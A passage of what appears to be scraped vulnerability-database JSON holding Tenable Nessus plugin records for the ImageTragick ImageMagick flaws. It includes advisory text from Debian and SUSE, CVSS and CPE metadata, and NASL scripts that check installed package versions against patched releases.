(deb_check(release:\"8.0\", prefix:\"imagemagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-6.q16\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-common\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-doc\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-q16-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", 
prefix:\"libmagick++-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-5\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-arch-config\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2-extra\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"perlmagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:07", "description": "Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered several vulnerabilities in ImageMagick, 
a program suite for image manipulation. These vulnerabilities, collectively known as ImageTragick, are the consequence of a lack of sanitization of untrusted input. An attacker with control over the image input could, with the privileges of the user running the application, execute code (CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if ImageMagick processes images coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and PLT) and indirect reads via the /etc/ImageMagick/policy.xml file. In addition, we introduce extra preventive measures, including some sanitization for input filenames in http/https delegates, the full removal of the PLT/Gnuplot decoder, and the need for an explicit reference in the filename for the insecure coders.\n\nFor wheezy, these problems have been fixed in version 8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-23T00:00:00", "type": "nessus", "title": "Debian DLA-486-1 : imagemagick security update (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:imagemagick", "p-cpe:/a:debian:debian_linux:imagemagick-common", "p-cpe:/a:debian:debian_linux:imagemagick-dbg", "p-cpe:/a:debian:debian_linux:imagemagick-doc", "p-cpe:/a:debian:debian_linux:libmagick%2b%2b-dev", "p-cpe:/a:debian:debian_linux:libmagick%2b%2b5", "p-cpe:/a:debian:debian_linux:libmagickcore-dev", "p-cpe:/a:debian:debian_linux:libmagickcore5", "p-cpe:/a:debian:debian_linux:libmagickcore5-extra", "p-cpe:/a:debian:debian_linux:libmagickwand-dev", "p-cpe:/a:debian:debian_linux:libmagickwand5", "p-cpe:/a:debian:debian_linux:perlmagick", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-486.NASL", "href": "https://www.tenable.com/plugins/nessus/91287", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-486-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91287);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-486-1 : imagemagick security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. An attacker with control on the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or\ndelete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717)\nlocal files.\n\nThese vulnerabilities are particularly critical if Imagemagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via /etc/ImageMagick/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the\nfilename for the insecure coders.\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/05/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/imagemagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick-doc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagick++-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagick++5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickcore-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickcore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickcore5-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickwand-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmagickwand5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:perlmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-common\", 
reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-doc\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagick++-dev\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagick++5\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore5\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore5-extra\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickwand5\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"perlmagick\", reference:\"8:6.7.7.10-5+deb7u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:54", "description": "This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders [boo#978061] These fix issues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717, CVE-2016-3718", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", 
"cpe": ["p-cpe:/a:novell:opensuse:ImageMagick", "p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-569.NASL", "href": "https://www.tenable.com/plugins/nessus/90981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-569.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90981);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-569 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders [boo#978061] These fix\nissues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\nCVE-2016-3717, CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-debugsource-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"libMagick++-6_Q16-5-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-6_Q16-5-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:38", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution attacks; these coders have now been disabled by default but can be re-enabled by editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient filtering of shell characters leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral' pseudo protocol, which deletes files after reading.\n\n - CVE-2016-3716: Possible file move, with any extension and into any folder, by using ImageMagick's 'msl' pseudo protocol.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label' pseudo protocol to get the content of files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make an HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : ImageMagick (SUSE-SU-2016:1260-1) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ImageMagick", "p-cpe:/a:novell:suse_linux:ImageMagick-debuginfo", "p-cpe:/a:novell:suse_linux:ImageMagick-debugsource", "p-cpe:/a:novell:suse_linux:libmagick%2b%2b-6_q16", "p-cpe:/a:novell:suse_linux:libmagick%2b%2b-6_q16-3-debuginfo", "p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16", "p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1", "p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1-debuginfo", "p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16", "p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16-1-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1260-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90996", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1260-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90996);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ImageMagick (SUSE-SU-2016:1260-1) (ImageTragick)\");\n 
script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
